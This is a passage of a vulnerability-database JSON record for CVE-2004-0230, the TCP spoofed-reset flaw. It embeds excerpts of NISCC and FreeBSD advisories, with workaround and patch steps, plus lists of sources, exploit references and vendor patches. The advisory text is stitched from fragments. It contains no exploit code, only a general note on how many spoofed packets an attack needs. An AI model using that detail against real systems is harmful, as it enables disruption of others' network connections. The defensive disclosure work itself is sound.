http://www.cymru.com/Documents/ip-stack-tuning.html\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"98%\" colspan=\"3\"\u003e\u003cb\u003eOther Documents\u003c/b\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eSANS discussion on egress filtering\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\u003ca href=\"http://www.sans.org/y2k/egress.htm\"\u003e\n    http://www.sans.org/y2k/egress.htm\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"98%\" colspan=\"3\"\u003e\u003cb\u003eVulnerability Databases\u003c/b\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eCommon Vulnerabilities and Exposures (CVE)\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230\"\u003e\n    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"96%\" colspan=\"2\"\u003eOpen Source Vulnerability Database (OSVDB)\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"2%\"\u003e\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"94%\"\u003e\n    \u003ca href=\"http://www.osvdb.org/displayvuln.php?osvdb_id=4030\"\u003e\n    http://www.osvdb.org/displayvuln.php?osvdb_id=4030\u003c/a\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\u003cp\u003e\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003eContact Information\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nThe NISCC Vulnerability Management Team can be contacted as follows:\u003cbr\u003e\n\n\u003c/p\u003e\n\n\u003c/p\u003e\n\n\u003ctable border=\"1\" width=\"87%\" cellspacing=\"3\" cellpadding=\"5\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"30%\" valign=\"top\"\u003eEmail\u003c/td\u003e\n    \u003ctd width=\"70%\"\u003e\u003ca href=\"mailto:vulteam@niscc.gov.uk\"\u003evulteam@niscc.gov.uk\u003c/a\u003e\n      \u003cbr\u003e\u003ci\u003e(Please quote the advisory reference in the subject line.)\u003c/i\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"30%\" valign=\"top\"\u003eTelephone\u003c/td\u003e\n    \u003ctd width=\"70%\"\u003e   +44 (0)20 7821 1330 Extension 4511\n      \u003cbr\u003e\u003ci\u003e(Monday to Friday 08:30 - 17:00)\u003c/i\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"30%\" valign=\"top\"\u003eFax\u003c/td\u003e\n    \u003ctd width=\"70%\"\u003e         +44 (0)20 7821 1686\u003c/td\u003e\n  \u003c/tr\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"30%\" valign=\"top\"\u003ePost\u003c/td\u003e\n    \u003ctd width=\"70%\"\u003e        Vulnerability Management Team\u003cbr\u003e\n            NISCC\u003cbr\u003e\n            PO Box 832\u003cbr\u003e\n            London\u003cbr\u003e\n            SW1P 1BG\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\n\u003cbr\u003e\nWe encourage those who wish to communicate via email to make use of our PGP key.  This is available from \u003ca href=\"http://www.uniras.gov.uk/UNIRAS.asc\"\u003ehttp://www.uniras.gov.uk/UNIRAS.asc\u003c/a\u003e.\u003cbr\u003e\n\u003cbr\u003e\nPlease note that UK government protectively marked material should not be sent to the email address above.\u003cbr\u003e\n\u003cbr\u003e\nIf you wish to be added to our email distribution list, please email your request to \u003ca href=\"mailto:uniras@niscc.gov.uk\"\u003euniras@niscc.gov.uk\u003c/a\u003e.\u003cbr\u003e\n\n\n\n\u003cbr\u003e\n\u003cbr\u003e\n\u003cb\u003e\nWhat is NISCC?\u003c/b\u003e\u003cbr\u003e\n\u003cbr\u003e\nFor further information regarding the UK National Infrastructure Security Co-Ordination Centre, please visit the NISCC web site at:\n\u003cbr\u003e\n\u003ca href=\"http://www.niscc.gov.uk/aboutniscc/index.htm\"\u003ehttp://www.niscc.gov.uk/aboutniscc/index.htm\u003c/a\u003e\u003cbr\u003e\n\u003cbr\u003e\nReference to any specific commercial product, process or service by trade name, trademark manufacturer or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by NISCC.  The views and opinions of authors expressed within this notice shall not be used for advertising\nor product endorsement purposes.\u003cbr\u003e\n\u003cbr\u003e\nNeither shall NISCC accept responsibility for any errors or omissions contained within this advisory.  In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this notice.\u003cbr\u003e\n\u003cbr\u003e\n\\xa9 2004 Crown Copyright\u003cbr\u003e\n\u003cbr\u003e\nRevision History\u003cbr\u003e\n\u003cbr\u003e\n\u003ctable border=\"0\" width=\"100%\"\u003e\n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u003cfont size=\"2\"\u003eApril 20\u003c/font\u003e\u003cSMALL\u003e, 2004:\n\u003c/SMALL\u003e\n    \u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cSMALL\u003e\n  Initial release (1.0)\u003c/SMALL\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u003cfont size=\"2\"\u003eApril 21, 2004:\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eCorrected hyperlinks (1.1)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted impact statement for Cisco (1.1)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted impact statement for Mitel (1.1)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted MRLG patch reference (1.2)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u003cfont size=\"2\"\u003eApril 22, 2004:\u003c/font\u003e\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eRevised impact statement for Certicom (1.3)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted impact statement for Nortel Networks (1.3)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted impact statement for Secure Computing Corporation (1.3)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted references section (1.4)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003ctr\u003e\n    \u003ctd width=\"23%\"\u003e\n\u0026nbsp;\u003c/td\u003e\n    \u003ctd width=\"77%\"\u003e\n\u003cfont size=\"2\"\u003eInserted impact statement for Lucent Technologies (1.4)\u003c/font\u003e\u003c/td\u003e\n  \u003c/tr\u003e\n    \n  \u003c/table\u003e\n\n\n\n\u003cbr\u003e\n\u0026lt;End of NISCC Vulnerability Advisory\u003e\u003cbr\u003e\n\u003c/div\u003e\n\u003c/body\u003e\n\n\u003c/html\u003e. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-14:19.tcp                                        Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          Denial of Service in TCP packet processing\n\nCategory:       core\nModule:         inet\nAnnounced:      2014-09-16\nCredits:        Jonathan Looney (Juniper SIRT)\nAffects:        All supported versions of FreeBSD. \nCorrected:      2014-09-16 09:48:35UTC (stable/10, 10.1-PRERELEASE)\n                2014-09-16 09:48:35 UTC (stable/10, 10.1-BETA1-p1)\n                2014-09-16 09:50:19 UTC (releng/10.0, 10.0-RELEASE-p9)\n                2014-09-16 09:49:11 UTC (stable/9, 9.3-STABLE)\n                2014-09-16 09:50:19 UTC (releng/9.3, 9.3-RELEASE-p2)\n                2014-09-16 09:50:19 UTC (releng/9.2, 9.2-RELEASE-p12)\n                2014-09-16 09:50:19 UTC (releng/9.1, 9.1-RELEASE-p19)\n                2014-09-16 09:49:11 UTC (stable/8, 8.4-STABLE)\n                2014-09-16 09:50:19 UTC (releng/8.4, 8.4-RELEASE-p16)\nCVE Name:       CVE-2004-0230\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e.  New TCP connections are initiated using special SYN\nflag in a datagram.  Sequencing of data is controlled by 32-bit sequence\nnumbers, that start with a random value and are increased using modulo\n2**32 arithmetic.  In case one of the two port numbers is unknown, a successful\nattack requires less than 2**17 packets spoofed, which can be\ngenerated within less than a second on a decent connection to the\nInternet.  Workaround\n\nIt is possible to defend against these attacks with stateful traffic\ninspection using a firewall.  This can be done by enabling pf(4) on\nthe system and creating states for every connection.  Even a default\nruleset to allow all traffic would be sufficient to mitigate this\nissue. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:19/tcp.patch.asc\n# gpg --verify tcp.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile your kernel as described in\n\u003cURL:http://www.FreeBSD.org/handbook/kernelconfig.html\u003e and reboot the\nsystem. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/8/                                                         r271668\nreleng/8.4/                                                       r271669\nstable/9/                                                         r271668\nreleng/9.1/                                                       r271669\nreleng/9.2/                                                       r271669\nreleng/9.3/                                                       r271669\nstable/10/                                                        r271667\nreleng/10.0/                                                      r271669\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2004-0230"
          },
          {
            "db": "CERT/CC",
            "id": "VU#415294"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          },
          {
            "db": "BID",
            "id": "10183"
          },
          {
            "db": "VULHUB",
            "id": "VHN-8660"
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230"
          },
          {
            "db": "PACKETSTORM",
            "id": "37558"
          },
          {
            "db": "PACKETSTORM",
            "id": "33143"
          },
          {
            "db": "PACKETSTORM",
            "id": "33160"
          },
          {
            "db": "PACKETSTORM",
            "id": "33159"
          },
          {
            "db": "PACKETSTORM",
            "id": "33152"
          },
          {
            "db": "PACKETSTORM",
            "id": "128284"
          }
        ],
        "trust": 3.33
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=24033",
            "trust": 0.7,
            "type": "exploit"
          },
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-8660",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-8660"
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2004-0230",
            "trust": 3.4
          },
          {
            "db": "CERT/CC",
            "id": "VU#415294",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "10183",
            "trust": 2.9
          },
          {
            "db": "USCERT",
            "id": "TA04-111A",
            "trust": 2.3
          },
          {
            "db": "OSVDB",
            "id": "4030",
            "trust": 2.1
          },
          {
            "db": "MCAFEE",
            "id": "SB10053",
            "trust": 1.5
          },
          {
            "db": "SECUNIA",
            "id": "11458",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "11440",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "22341",
            "trust": 1.2
          },
          {
            "db": "JUNIPER",
            "id": "JSA10638",
            "trust": 1.2
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3983",
            "trust": 1.2
          },
          {
            "db": "XF",
            "id": "15886",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159",
            "trust": 0.7
          },
          {
            "db": "NSFOCUS",
            "id": "7605",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.1795",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "33159",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "33152",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "33160",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "33143",
            "trust": 0.2
          },
          {
            "db": "EXPLOIT-DB",
            "id": "24033",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "33202",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33185",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33153",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33172",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33174",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33171",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33243",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "33182",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "942",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "276",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "24031",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "24032",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "24030",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "291",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-77770",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-77769",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-77768",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-77771",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-18409",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-8660",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230",
            "trust": 0.1
          },
          {
            "db": "SECUNIA",
            "id": "15263",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "37558",
            "trust": 0.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#498440",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "128284",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#415294"
          },
          {
            "db": "VULHUB",
            "id": "VHN-8660"
          },
          {
            "db": "VULMON",
            "id": "CVE-2004-0230"
          },
          {
            "db": "BID",
            "id": "10183"
          },
          {
            "db": "PACKETSTORM",
            "id": "37558"
          },
          {
            "db": "PACKETSTORM",
            "id": "33143"
          },
          {
            "db": "PACKETSTORM",
            "id": "33160"
          },
          {
            "db": "PACKETSTORM",
            "id": "33159"
          },
          {
            "db": "PACKETSTORM",
            "id": "33152"
          },
          {
            "db": "PACKETSTORM",
            "id": "128284"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          },
          {
            "db": "NVD",
            "id": "CVE-2004-0230"
          }
        ]
      },
      "id": "VAR-200408-0145",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-8660"
          }
        ],
        "trust": 0.5305089336363636
      },
      "last_update_date": "2026-03-09T22:48:20.536000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "TCP RFC Alert",
            "trust": 0.8,
            "url": "http://www.checkpoint.com/services/techsupport/alerts/tcp_dos.html"
          },
          {
            "title": "cisco-sa-20040420-tcp-nonios",
            "trust": 0.8,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml"
          },
          {
            "title": "cisco-sa-20040420-tcp-ios",
            "trust": 0.8,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml"
          },
          {
            "title": "HPSBGN01041",
            "trust": 0.8,
            "url": "http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBGN01041"
          },
          {
            "title": "IY62006",
            "trust": 0.8,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1IY62006"
          },
          {
            "title": "IY55950",
            "trust": 0.8,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1IY55950"
          },
          {
            "title": "IY55949",
            "trust": 0.8,
            "url": "http://www-1.ibm.com/support/docview.wss?uid=isg1IY55949"
          },
          {
            "title": "TCP \u30d7\u30ed\u30c8\u30b3\u30eb\u306e\u8106\u5f31\u6027\u306b\u3088\u308b SEIL \u30b7\u30ea\u30fc\u30ba\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066",
            "trust": 0.8,
            "url": "http://www.seil.jp/ann/announce_20040421_01.txt"
          },
          {
            "title": "58784",
            "trust": 0.8,
            "url": "http://www.juniper.net/support/security/alerts/niscc-236929.txt"
          },
          {
            "title": "MS06-064",
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/MS06-064.mspx"
          },
          {
            "title": "MS05-019",
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/MS05-019.mspx"
          },
          {
            "title": "NV04-001",
            "trust": 0.8,
            "url": "http://www.nec.co.jp/security-info/secinfo/nv04-001.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - January 2015",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html"
          },
          {
            "title": "RT\u30b7\u30ea\u30fc\u30ba\u306eTCP\u306b\u95a2\u3059\u308b\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
            "trust": 0.8,
            "url": "http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/cert-ta04-111a.html"
          },
          {
            "title": "\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u60c5\u5831\uff082004\u5e747\u670820\u65e5\uff09",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/storage/diskarray/techsupport/sec_info/sec_20040423-1.html"
          },
          {
            "title": "\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u60c5\u5831\uff082004\u5e744\u670828\u65e5\uff09",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/storage/diskarray/techsupport/sec_info/sec_20040423-2.html"
          },
          {
            "title": "January 2015 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update"
          },
          {
            "title": "TCP\u306b\u6f5c\u5728\u3059\u308b\u8106\u5f31\u6027 (2004\u5e7410\u67087\u65e5)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_sd_200402.html"
          },
          {
            "title": "SYM05-008",
            "trust": 0.8,
            "url": "http://securityresponse.symantec.com/avcenter/security/Content/2005.05.02.html"
          },
          {
            "title": "cisco-sa-20040420-tcp-nonios",
            "trust": 0.8,
            "url": "http://www.cisco.com/japanese/warp/public/3/jp/service/tac/707/cisco-sa-20040420-tcp-nonios-j.shtml"
          },
          {
            "title": "cisco-sa-20040420-tcp-ios",
            "trust": 0.8,
            "url": "http://www.cisco.com/japanese/warp/public/3/jp/service/tac/707/cisco-sa-20040420-tcp-ios-j.shtml"
          },
          {
            "title": "SYM05-008",
            "trust": 0.8,
            "url": "http://www.symantec.com/region/jp/avcenter/security/content/2005.05.02.html"
          },
          {
            "title": "TCP RFC\u306b\u95a2\u3059\u308bAlert",
            "trust": 0.8,
            "url": "http://www.checkpoint.co.jp/techsupport/alerts/tcp_rfc_alert.html"
          },
          {
            "title": "TCP \u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
            "trust": 0.8,
            "url": "http://www.allied-telesis.co.jp/support/list/faq/vuls/20040421.html"
          },
          {
            "title": "\u300cTCP \u30d7\u30ed\u30c8\u30b3\u30eb\u306b\u6f5c\u5728\u3059\u308b\u4fe1\u983c\u6027\u306e\u554f\u984c\u300d\u306b\u95a2\u3059\u308b\u88fd\u54c1\u306e\u5bfe\u5fdc\u306b\u3064\u3044\u3066",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/Secureplaza/html/hirt/20040422.html"
          },
          {
            "title": "MS06-064",
            "trust": 0.8,
            "url": "http://www.microsoft.com/japan/technet/security/bulletin/MS06-064.mspx"
          },
          {
            "title": "MS05-019",
            "trust": 0.8,
            "url": "http://www.microsoft.com/japan/technet/security/bulletin/MS05-019.mspx"
          },
          {
            "title": "[\u304a\u77e5\u3089\u305b] TCP\u306b\u6f5c\u5728\u3059\u308b\u8106\u5f31\u6027\u3078\u306e\u5bfe\u5fdc\u306b\u3064\u3044\u3066",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/cert/236929_tcp.html"
          },
          {
            "title": "Cisco: TCP Vulnerabilities in Multiple Non-IOS Cisco Products",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20040420-tcp-nonios"
          },
          {
            "title": "Cisco: TCP Vulnerabilities in Multiple IOS-Based Cisco Products",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20040420-tcp-ios"
          },
          {
            "title": "Fortinet Security Advisories: CVE-2004-0230 Blind Reset Attack Using the RST/SYN Bit",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=fortinet_security_advisories\u0026qid=FG-IR-16-039"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
          },
          {
            "title": "ips-assessment-reports",
            "trust": 0.1,
            "url": "https://github.com/gabrieljcs/ips-assessment-reports "
          },
          {
            "title": "dsm_ips",
            "trust": 0.1,
            "url": "https://github.com/biswajitde/dsm_ips "
          },
          {
            "title": "rhsecapi",
            "trust": 0.1,
            "url": "https://github.com/RedHatOfficial/rhsecapi "
          },
          {
            "title": "cve-pylib",
            "trust": 0.1,
            "url": "https://github.com/RedHatProductSecurity/cve-pylib "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2004-0230"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2004-0230"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.6,
            "url": "http://www.securityfocus.com/bid/10183"
          },
          {
            "trust": 2.3,
            "url": "http://www.us-cert.gov/cas/techalerts/ta04-111a.html"
          },
          {
            "trust": 2.1,
            "url": "http://www.kb.cert.org/vuls/id/415294"
          },
          {
            "trust": 1.5,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
          },
          {
            "trust": 1.5,
            "url": "http://www.uniras.gov.uk/vuls/2004/236929/index.htm"
          },
          {
            "trust": 1.4,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10053"
          },
          {
            "trust": 1.4,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0230"
          },
          {
            "trust": 1.2,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml"
          },
          {
            "trust": 1.2,
            "url": "http://kb.juniper.net/jsa10638"
          },
          {
            "trust": 1.2,
            "url": "http://www.securityfocus.com/archive/1/449179/100/0/threaded"
          },
          {
            "trust": 1.2,
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-019"
          },
          {
            "trust": 1.2,
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-064"
          },
          {
            "trust": 1.2,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2004-006.txt.asc"
          },
          {
            "trust": 1.2,
            "url": "http://www.osvdb.org/4030"
          },
          {
            "trust": 1.2,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a2689"
          },
          {
            "trust": 1.2,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a270"
          },
          {
            "trust": 1.2,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a3508"
          },
          {
            "trust": 1.2,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4791"
          },
          {
            "trust": 1.2,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a5711"
          },
          {
            "trust": 1.2,
            "url": "ftp://ftp.sco.com/pub/updates/unixware/scosa-2005.14/scosa-2005.14.txt"
          },
          {
            "trust": 1.2,
            "url": "ftp://ftp.sco.com/pub/updates/openserver/scosa-2005.3/scosa-2005.3.txt"
          },
          {
            "trust": 1.2,
            "url": "ftp://ftp.sco.com/pub/updates/openserver/scosa-2005.9/scosa-2005.9.txt"
          },
          {
            "trust": 1.2,
            "url": "http://secunia.com/advisories/11440"
          },
          {
            "trust": 1.2,
